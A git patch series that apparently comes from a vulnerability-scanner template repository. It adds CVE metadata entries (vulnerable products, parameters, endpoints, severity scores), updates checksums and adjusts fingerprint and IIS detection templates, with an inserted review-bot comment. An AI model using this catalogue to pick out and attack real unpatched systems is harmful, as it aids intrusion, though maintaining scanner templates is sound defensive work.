URI.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-40150.yaml"} {"ID":"CVE-2021-40323","Info":{"Name":"Cobbler \u003c3.3.0 - Remote Code Execution","Severity":"critical","Description":"Cobbler before 3.3.0 allows log poisoning and resultant remote code execution via an XMLRPC method.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-40323.yaml"} -{"ID":"CVE-2021-40438","Info":{"Name":"Apache \u003c= 2.4.48 - Mod_Proxy SSRF","Severity":"critical","Description":"Apache 2.4.48 and below contain an issue where uri-path can cause mod_proxy to forward the request to an origin server chosen by the remote user.","Classification":{"CVSSScore":"9"}},"file_path":"http/cves/2021/CVE-2021-40438.yaml"} +{"ID":"CVE-2021-40438","Info":{"Name":"Apache \u003c= 2.4.48 Mod_Proxy - Server-Side Request Forgery","Severity":"critical","Description":"Apache 2.4.48 and below contain an issue where uri-path can cause mod_proxy to forward the request to an origin server chosen by the remote user.","Classification":{"CVSSScore":"9"}},"file_path":"http/cves/2021/CVE-2021-40438.yaml"} 
{"ID":"CVE-2021-40539","Info":{"Name":"Zoho ManageEngine ADSelfService Plus v6113 - Unauthenticated Remote Command Execution","Severity":"critical","Description":"Zoho ManageEngine ADSelfService Plus version 6113 and prior are vulnerable to a REST API authentication bypass vulnerability that can lead to remote code execution.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-40539.yaml"} {"ID":"CVE-2021-40542","Info":{"Name":"Opensis-Classic 8.0 - Cross-Site Scripting","Severity":"medium","Description":"Opensis-Classic Version 8.0 is affected by cross-site scripting. An unauthenticated user can inject and execute JavaScript code through the link_url parameter in Ajax_url_encode.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-40542.yaml"} {"ID":"CVE-2021-40651","Info":{"Name":"OS4Ed OpenSIS Community 8.0 - Local File Inclusion","Severity":"medium","Description":"OS4Ed OpenSIS Community 8.0 is vulnerable to a local file inclusion vulnerability in Modules.php (modname parameter), which can disclose arbitrary file from the server's filesystem as long as the application has access to the file.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2021/CVE-2021-40651.yaml"} 
@@ -2171,7 +2171,7 @@ {"ID":"CVE-2023-37728","Info":{"Name":"IceWarp Webmail Server v10.2.1 - Cross Site Scripting","Severity":"medium","Description":"Icewarp Icearp v10.2.1 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-37728.yaml"} {"ID":"CVE-2023-37979","Info":{"Name":"Ninja Forms \u003c 3.6.26 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-37979.yaml"} {"ID":"CVE-2023-38035","Info":{"Name":"Ivanti Sentry - Authentication Bypass","Severity":"critical","Description":"A security vulnerability in MICS Admin Portal in Ivanti MobileIron Sentry versions 9.18.0 and below, which may allow an attacker to bypass authentication controls on the administrative interface due to an insufficiently restrictive Apache HTTPD configuration.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38035.yaml"} -{"ID":"CVE-2023-38203","Info":{"Name":"Adobe ColdFusion Deserialization of Untrusted Data","Severity":"critical","Description":"Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. 
Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38203.yaml"} +{"ID":"CVE-2023-38203","Info":{"Name":"Adobe ColdFusion - Deserialization of Untrusted Data","Severity":"critical","Description":"Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38203.yaml"} {"ID":"CVE-2023-38205","Info":{"Name":"Adobe ColdFusion - Access Control Bypass","Severity":"high","Description":"There is an access control bypass vulnerability in Adobe ColdFusion versions 2023 Update 2 and below, 2021 Update 8 and below and 2018 update 18 and below, which allows a remote attacker to bypass the ColdFusion mechanisms that restrict unauthenticated external access to ColdFusion's Administrator.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-38205.yaml"} {"ID":"CVE-2023-3836","Info":{"Name":"Dahua Smart Park Management - Arbitrary File Upload","Severity":"critical","Description":"Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-3836.yaml"} {"ID":"CVE-2023-3843","Info":{"Name":"mooDating 1.2 - Cross-site scripting","Severity":"medium","Description":"A vulnerability was found in mooSocial mooDating 1.2. It has been classified as problematic. Affected is an unknown function of the file /matchmakings/question of the component URL Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. 
VDB-235194 is the identifier assigned to this vulnerability. NOTE: We tried to contact the vendor early about the disclosure but the official mail address was not working properly.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3843.yaml"} 
@@ -2227,6 +2227,7 @@ {"ID":"CVE-2023-42442","Info":{"Name":"JumpServer \u003e 3.6.4 - Information Disclosure","Severity":"medium","Description":"JumpServer is an open source bastion host and a professional operation and maintenance security audit system. Starting in version 3.0.0 and prior to versions 3.5.5 and 3.6.4, session replays can download without authentication. Session replays stored in S3, OSS, or other cloud storage are not affected. The api `/api/v1/terminal/sessions/` permission control is broken and can be accessed anonymously. SessionViewSet permission classes set to `[RBACPermission | IsSessionAssignee]`, relation is or, so any permission matched will be allowed. Versions 3.5.5 and 3.6.4 have a fix. After upgrading, visit the api `$HOST/api/v1/terminal/sessions/?limit=1`. The expected http response code is 401 (`not_authenticated`).\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-42442.yaml"} {"ID":"CVE-2023-42793","Info":{"Name":"JetBrains TeamCity \u003c 2023.05.4 - Remote Code Execution","Severity":"critical","Description":"In JetBrains TeamCity before 2023.05.4 authentication bypass leading to RCE on TeamCity Server was possible\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-42793.yaml"} {"ID":"CVE-2023-43177","Info":{"Name":"CrushFTP \u003c 10.5.1 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"CrushFTP prior to 10.5.1 is vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43177.yaml"} +{"ID":"CVE-2023-43187","Info":{"Name":"NodeBB XML-RPC Request xmlrpc.php - XML Injection","Severity":"critical","Description":"A remote code execution (RCE) vulnerability in the xmlrpc.php endpoint of NodeBB Inc NodeBB forum software prior to v1.18.6 allows attackers to execute arbitrary code via crafted XML-RPC 
requests.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43187.yaml"} {"ID":"CVE-2023-43261","Info":{"Name":"Milesight Routers - Information Disclosure","Severity":"high","Description":"A critical security vulnerability has been identified in Milesight Industrial Cellular Routers, compromising the security of sensitive credentials and permitting unauthorized access. This vulnerability stems from a misconfiguration that results in directory listing being enabled on the router systems, rendering log files publicly accessible. These log files, while containing sensitive information such as admin and other user passwords (encrypted as a security measure), can be exploited by attackers via the router's web interface. The presence of a hardcoded AES secret key and initialization vector (IV) in the JavaScript code further exacerbates the situation, facilitating the decryption of these passwords. This chain of vulnerabilities allows malicious actors to gain unauthorized access to the router.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-43261.yaml"} {"ID":"CVE-2023-43325","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in the data[redirect_url] parameter on user login function of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-43325.yaml"} {"ID":"CVE-2023-43326","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in multiple url of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-43326.yaml"} 
@@ -2257,8 +2258,10 @@ {"ID":"CVE-2023-49103","Info":{"Name":"OwnCloud - Phpinfo Configuration","Severity":"high","Description":"An issue was discovered in ownCloud owncloud/graphapi 0.2.x before 0.2.1 and 0.3.x before 0.3.1. The graphapi app relies on a third-party GetPhpInfo.php library that provides a URL. When this URL is accessed, it reveals the configuration details of the PHP environment (phpinfo). This information includes all the environment variables of the webserver. In containerized deployments, these environment variables may include sensitive data such as the ownCloud admin password, mail server credentials, and license key. Simply disabling the graphapi app does not eliminate the vulnerability. Additionally, phpinfo exposes various other potentially sensitive configuration details that could be exploited by an attacker to gather information about the system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-49103.yaml"} {"ID":"CVE-2023-4966","Info":{"Name":"Citrix Bleed - Leaking Session Tokens","Severity":"high","Description":"Sensitive information disclosure in NetScaler ADC and NetScaler Gateway when configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA ?virtual?server.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-4966.yaml"} {"ID":"CVE-2023-4974","Info":{"Name":"Academy LMS 6.2 - SQL Injection","Severity":"critical","Description":"A vulnerability was found in Academy LMS 6.2. It has been rated as critical. Affected by this issue is some unknown functionality of the file /academy/tutor/filter of the component GET Parameter Handler. The manipulation of the argument price_min/price_max leads to sql injection. The attack may be launched remotely. VDB-239750 is the identifier assigned to this vulnerability. 
NOTE: The vendor was contacted early about this disclosure but did not respond in any way.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4974.yaml"} +{"ID":"CVE-2023-49785","Info":{"Name":"ChatGPT-Next-Web - SSRF/XSS","Severity":"critical","Description":"Full-Read SSRF/XSS in NextChat, aka ChatGPT-Next-Web\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2023/CVE-2023-49785.yaml"} {"ID":"CVE-2023-50290","Info":{"Name":"Apache Solr - Host Environment Variables Leak via Metrics API","Severity":"medium","Description":"Exposure of Sensitive Information to an Unauthorized Actor Vulnerability in Apache Solr.\nThe Solr Metrics API publishes all unprotected environment variables available to each Apache Solr instance. Users can specify which environment variables to hide, however, the default list is designed to work for known secret Java system properties. Environment variables cannot be strictly defined in Solr, like Java system properties can be, and may be set for the entire host,unlike Java system properties which are set per-Java-proccess.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-50290.yaml"} {"ID":"CVE-2023-5074","Info":{"Name":"D-Link D-View 8 v2.0.1.28 - Authentication Bypass","Severity":"critical","Description":"Use of a static key to protect a JWT token used in user authentication can allow an for an authentication bypass in D-Link D-View 8 v2.0.1.28\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-5074.yaml"} +{"ID":"CVE-2023-5089","Info":{"Name":"Defender Security \u003c 4.1.0 - Protection Bypass (Hidden Login Page)","Severity":"medium","Description":"The Defender Security WordPress plugin before 4.1.0 does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the login page, even when the hide login page functionality of the plugin is 
enabled.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-5089.yaml"} {"ID":"CVE-2023-50917","Info":{"Name":"MajorDoMo thumb.php - OS Command Injection","Severity":"critical","Description":"MajorDoMo (aka Major Domestic Module) before 0662e5e allows command execution via thumb.php shell metacharacters. NOTE: this is unrelated to the Majordomo mailing-list manager.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-50917.yaml"} {"ID":"CVE-2023-50968","Info":{"Name":"Apache OFBiz \u003c 18.12.11 - Server Side Request Forgery","Severity":"high","Description":"Arbitrary file properties reading vulnerability in Apache Software Foundation Apache OFBiz when user operates an uri call without authorizations. The same uri can be operated to realize a SSRF attack also without authorizations. Users are recommended to upgrade to version 18.12.11, which fixes this issue.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-50968.yaml"} {"ID":"CVE-2023-51467","Info":{"Name":"Apache OFBiz \u003c 18.12.11 - Remote Code Execution","Severity":"critical","Description":"The vulnerability allows attackers to bypass authentication to achieve a simple Server-Side Request Forgery (SSRF)\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-51467.yaml"} 
@@ -2267,6 +2270,8 @@ {"ID":"CVE-2023-5360","Info":{"Name":"WordPress Royal Elementor Addons Plugin \u003c= 1.3.78 - Arbitrary File Upload","Severity":"critical","Description":"Arbitrary File Upload vulnerability in WordPress Royal Elementor Addons Plugin. This could allow a malicious actor to upload any type of file to your website. This can include backdoors which are then executed to gain further access to your website. This vulnerability has been fixed in version 1.3.79\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-5360.yaml"} {"ID":"CVE-2023-5375","Info":{"Name":"Mosparo \u003c 1.0.2 - Open Redirect","Severity":"medium","Description":"Open Redirect in GitHub repository mosparo/mosparo prior to 1.0.2.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-5375.yaml"} {"ID":"CVE-2023-5556","Info":{"Name":"Structurizr on-premises - Cross Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository structurizr/onpremises prior to 3194.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-5556.yaml"} +{"ID":"CVE-2023-5830","Info":{"Name":"ColumbiaSoft DocumentLocator - Improper Authentication","Severity":"critical","Description":"Instances of ColumbiaSoft's Document Locator prior to version 7.2 SP4 and 2021.1 are vulnerable to an Improper Authentication/SSRF vulnerability. This template identifies vulnerable instances of the ColumbiaSoft Document Locater application by confirming external DNS interaction/lookups by modifying the value of the client-side SERVER parameter at /api/authentication/login.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-5830.yaml"} +{"ID":"CVE-2023-5914","Info":{"Name":"Citrix StoreFront - Cross-Site Scripting","Severity":"medium","Description":"Reflected Cross-Site Scripting issue which is exploitable without authentication. 
This vulnerability was exploitable through coercing an error message during an XML parsing procedure in the SSO flow.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-5914.yaml"} {"ID":"CVE-2023-6018","Info":{"Name":"Mlflow - Arbitrary File Write","Severity":"critical","Description":"An attacker can overwrite any file on the server hosting MLflow without any authentication.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6018.yaml"} {"ID":"CVE-2023-6020","Info":{"Name":"Ray Static File - Local File Inclusion","Severity":"high","Description":"LFI in Ray's /static/ directory allows attackers to read any file on the server without authentication.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6020.yaml"} {"ID":"CVE-2023-6021","Info":{"Name":"Ray API - Local File Inclusion","Severity":"high","Description":"LFI in Ray's log API endpoint allows attackers to read any file on the server without authentication.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6021.yaml"} 
@@ -2295,6 +2300,8 @@ {"ID":"CVE-2024-1208","Info":{"Name":"LearnDash LMS \u003c 4.10.3 - Sensitive Information Exposure","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.2 via API. This makes it possible for unauthenticated attackers to obtain access to quiz questions.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1208.yaml"} {"ID":"CVE-2024-1209","Info":{"Name":"LearnDash LMS \u003c 4.10.2 - Sensitive Information Exposure via assignments","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via direct file access due to insufficient protection of uploaded assignments. This makes it possible for unauthenticated attackers to obtain those uploads.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1209.yaml"} {"ID":"CVE-2024-1210","Info":{"Name":"LearnDash LMS \u003c 4.10.2 - Sensitive Information Exposure","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via API. 
This makes it possible for unauthenticated attackers to obtain access to quizzes.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1210.yaml"} +{"ID":"CVE-2024-1212","Info":{"Name":"Progress Kemp LoadMaster - Command Injection","Severity":"critical","Description":"Unauthenticated remote attackers can access the system through the LoadMaster management interface, enabling arbitrary system command execution.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-1212.yaml"} +{"ID":"CVE-2024-1698","Info":{"Name":"NotificationX \u003c= 2.8.2 - SQL Injection","Severity":"critical","Description":"The NotificationX - Best FOMO, Social Proof, WooCommerce Sales Popup \u0026 Notification Bar Plugin With Elementor plugin for WordPress is vulnerable to SQL Injection via the 'type' parameter in all versions up to, and including, 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-1698.yaml"} {"ID":"CVE-2024-1709","Info":{"Name":"ConnectWise ScreenConnect 23.9.7 - Authentication Bypass","Severity":"critical","Description":"ConnectWise ScreenConnect 23.9.7 and prior are affected by an Authentication Bypass Using an Alternate Path or Channel vulnerability, which may allow an attacker direct access to confidential information or critical systems.\n","Classification":{"CVSSScore":"10.0"}},"file_path":"http/cves/2024/CVE-2024-1709.yaml"} {"ID":"CVE-2024-21644","Info":{"Name":"pyLoad Flask Config - Access Control","Severity":"high","Description":"pyLoad is the free and open-source Download Manager written in pure Python. 
Any unauthenticated user can browse to a specific URL to expose the Flask config, including the `SECRET_KEY` variable. This issue has been patched in version 0.5.0b3.dev77.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-21644.yaml"} {"ID":"CVE-2024-21645","Info":{"Name":"pyload - Log Injection","Severity":"medium","Description":"A log injection vulnerability was identified in pyload. This vulnerability allows any unauthenticated actor to inject arbitrary messages into the logs gathered by pyload.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-21645.yaml"} 
@@ -2307,6 +2314,9 @@ {"ID":"CVE-2024-25600","Info":{"Name":"Unauthenticated Remote Code Execution – Bricks \u003c= 1.9.6","Severity":"critical","Description":"Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks \u003c= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE) which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25600.yaml"} {"ID":"CVE-2024-25669","Info":{"Name":"CaseAware a360inc - Cross-Site Scripting","Severity":"medium","Description":"a360inc CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string. This is a bypass of the fix reported in CVE-2017-\u003e\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-25669.yaml"} {"ID":"CVE-2024-25735","Info":{"Name":"WyreStorm Apollo VX20 - Information Disclosure","Severity":"high","Description":"An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. 
Remote attackers can discover cleartext credentials for the SoftAP (access point) Router /device/config using an HTTP GET request.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25735.yaml"} +{"ID":"CVE-2024-27198","Info":{"Name":"TeamCity \u003c 2023.11.4 - Authentication Bypass","Severity":"critical","Description":"In JetBrains TeamCity before 2023.11.4 authentication bypass allowing to perform admin actions was possible\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-27198.yaml"} +{"ID":"CVE-2024-27199","Info":{"Name":"TeamCity \u003c 2023.11.4 - Authentication Bypass","Severity":"high","Description":"In JetBrains TeamCity before 2023.11.4 path traversal allowing to perform limited admin actions was possible\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2024/CVE-2024-27199.yaml"} +{"ID":"CVE-2024-27497","Info":{"Name":"Linksys E2000 1.0.06 position.js Improper Authentication","Severity":"high","Description":"Linksys E2000 Ver.1.0.06 build 1 is vulnerable to authentication bypass via the position.js file.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-27497.yaml"} {"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"} {"ID":"CVE-2011-2523","Info":{"Name":"VSFTPD 2.3.4 - Backdoor Command Execution","Severity":"critical","Description":"VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. 
The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2011/CVE-2011-2523.yaml"} {"ID":"CVE-2015-3306","Info":{"Name":"ProFTPd - Remote Code Execution","Severity":"critical","Description":"ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.","Classification":{"CVSSScore":"10"}},"file_path":"network/cves/2015/CVE-2015-3306.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index f16efa320f..fc1928fe0c 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -d1c0809e63305403ca431401cfcebe07 +0718093f8377862f2723b488bb15e23a From e8b983ce786ddb7655c08a9bb4a0c8bdd56fc359 Mon Sep 17 00:00:00 2001 From: Brandon Hutchinson Date: Wed, 20 Mar 2024 14:43:33 +0000 Subject: [PATCH 34/53] Update fingerprinthub-web-fingerprints.yaml --- http/technologies/fingerprinthub-web-fingerprints.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/technologies/fingerprinthub-web-fingerprints.yaml b/http/technologies/fingerprinthub-web-fingerprints.yaml index d2c5098ffb..e42e6eb61e 100755 --- a/http/technologies/fingerprinthub-web-fingerprints.yaml +++ b/http/technologies/fingerprinthub-web-fingerprints.yaml @@ -11440,6 +11440,7 @@ http: name: softether-vpn words: -
  • manage this vpn server or vpn bridge
      + case-insensitive: true - type: word name: softnext-spam From 752b0fbc3d0dfaf473b1990278acf6e482f3d6ec Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 20 Mar 2024 23:12:09 +0530 Subject: [PATCH 35/53] Update microsoft-iis-version.yaml --- http/technologies/microsoft/microsoft-iis-version.yaml | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/http/technologies/microsoft/microsoft-iis-version.yaml b/http/technologies/microsoft/microsoft-iis-version.yaml index 7a85340474..ac03e25967 100644 --- a/http/technologies/microsoft/microsoft-iis-version.yaml +++ b/http/technologies/microsoft/microsoft-iis-version.yaml @@ -9,11 +9,14 @@ info: max-request: 1 tags: tech,microsoft,iis + http: - method: GET path: - "{{BaseURL}}" + host-redirects: true + max-redirects: 4 matchers-condition: and matchers: - type: word @@ -21,10 +24,6 @@ http: words: - "IIS" - - type: status - status: - - 200 - extractors: - type: kval part: header From afc3d77d80752f203f79db73090b33255fa86273 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 20 Mar 2024 17:44:10 +0000 Subject: [PATCH 36/53] Auto Generated New Template Addition List [Wed Mar 20 17:44:10 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index e60a673523..47df011d4e 100644 --- a/.new-additions +++ b/.new-additions @@ -1,4 +1,5 @@ dns/soa-detect.yaml +dns/spf-record-detect.yaml dns/txt-service-detect.yaml file/keys/dependency/dependency-track.yaml file/keys/docker/dockerhub-pat.yaml From 1b191f5fc4d2361a13e2fdc6370ea336848d2603 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 20 Mar 2024 17:44:22 +0000 Subject: [PATCH 37/53] Auto Generated Templates Checksum [Wed Mar 20 17:44:22 UTC 2024] :robot: --- templates-checksum.txt | 13 +++++++------ 1 file changed, 7 insertions(+), 6 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 6048164bfe..e2f8d3cfd0 100644 --- a/templates-checksum.txt 
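Review bot: With the `status` matcher dropped in the second hunk, the word matcher on `"IIS"` is the only matcher left, so `matchers-condition: and` (shown in the first hunk) no longer combines anything and can be removed. The line between the two hunks (old line 20, where this matcher's `part:` would sit) is not shown; if the word matcher is not restricted with `part: header`, `"IIS"` will also match any response body that merely mentions the product, and the removed 200-status check no longer narrows that. Tying the matcher to the header the kval extractor already reads, `part: header` above `words:`, keeps the fingerprint on the `Server` value rather than page content. The `http` block continues past both hunks.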
+++ b/templates-checksum.txt @@ -105,8 +105,8 @@ config/pentest.yml:e3a9ebe543e9c2d046ead1efc292394b54a55196 config/privilege-escalation.yml:325607b721fcea55111f8698b10951fd2f0d17b8 config/recommended.yml:adcd4e1f0ef7b6b8c57fddbdda3ebf2314a8fa9b contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:51d8ac58d8ffdf6cfd4660d3e19373bb08bb6605 -cves.json-checksum.txt:fdca644f563bcfe217c57881fc5991db50a942e4 +cves.json:3b21f179e553a113562af785def57c341b663071 +cves.json-checksum.txt:e03adc785e821e31dd4936f083dc56fbb0b302df dns/azure-takeover-detection.yaml:34e8e8a0db3e2ff7af0bf8df8ee9c54f2ee8e3b4 dns/caa-fingerprint.yaml:71845ba0a32b1968e23b507166275ee4c1f84b24 dns/detect-dangling-cname.yaml:0c5204f22465c8ebb8ae31e6265ffa5c0cd4b6e2 @@ -123,9 +123,10 @@ dns/nameserver-fingerprint.yaml:7a9247d4f45a9699418b4afed5cea0388b147735 dns/ptr-fingerprint.yaml:ecff55b058dba2ad98432eacea8b52ce1d8e7656 dns/servfail-refused-hosts.yaml:ee2505b5619921a20332494f2281664eaf01fa87 dns/soa-detect.yaml:5c758030190eea7fc6934a23dd266362ee2a355b +dns/spf-record-detect.yaml:d284769413067e7c7fdfa930502a15242a628703 dns/spoofable-spf-records-ptr.yaml:7cb8aa2d5fa1b19224a6ca0b17c5b46377892ee7 dns/txt-fingerprint.yaml:eca4bcdfb25f2922e233e4801f1beb27893f7e70 -dns/txt-service-detect.yaml:9a941b2fa182292c0b9bd2f9d549a953c469c9f8 +dns/txt-service-detect.yaml:c331256e50faf2211d80f1f973f42c748d86a5d1 dns/worksites-detection.yaml:c54ce778fe66a138e794b87520392f285c8b6259 file/android/adb-backup-enabled.yaml:4ca96a12120754577166567e047e6735d1214891 file/android/biometric-detect.yaml:27a81bc01a126a6923c702d556dac9da857971d8 
@@ -4536,7 +4537,7 @@ http/exposures/files/filezilla.yaml:a04a2de7145d42c6cc63a59edf5c13c9660218b5 http/exposures/files/ftpconfig.yaml:37d46a4726edffd9d686224d0a3be7df6ec2780d http/exposures/files/gcloud-access-token.yaml:62d8288a11a5350a01d3e0041ac28c92b7889910 http/exposures/files/gcloud-credentials.yaml:2343f7b00527e9831a765ea61960df72176b1bf1 -http/exposures/files/generic-db.yaml:1f5cc209039fbe3d53d29286d46bea2e8ffada19 +http/exposures/files/generic-db.yaml:36dc57f7db3eac512d56d7d54f0bb767cbb7fe88 http/exposures/files/get-access-token-json.yaml:81c5d4a38a413cda6fbf584f3a955d89dc48a28d http/exposures/files/git-mailmap.yaml:456e18f1c474d4628acc7356b1f816f1fee19fcf http/exposures/files/github-gemfile-files.yaml:451504bab87de4abd36fd46ad03629bdc24ffe5e @@ -6681,7 +6682,7 @@ http/technologies/web-ftp-detect.yaml:ceaf8743ca94c6fbf3e7d380d0ed9be6f3796120 http/technologies/web-suite-detect.yaml:94ce185f9aee3a32ab9391218413ba5b4efd408f http/technologies/weblogic-detect.yaml:57acbd03a2cd58cd94f92843578359a5b479ac5d http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddfc6a34542 -http/technologies/wing-ftp-service-detect.yaml:416707a344d027b1224855a9c085642fadcccf38 +http/technologies/wing-ftp-service-detect.yaml:0df5cbc14e688f4a21fb88751550ed2dc27e5497 http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 http/technologies/wordpress/plugins/ad-inserter.yaml:e1496850b2a8ebec1b470544d5bb38e52760d900 
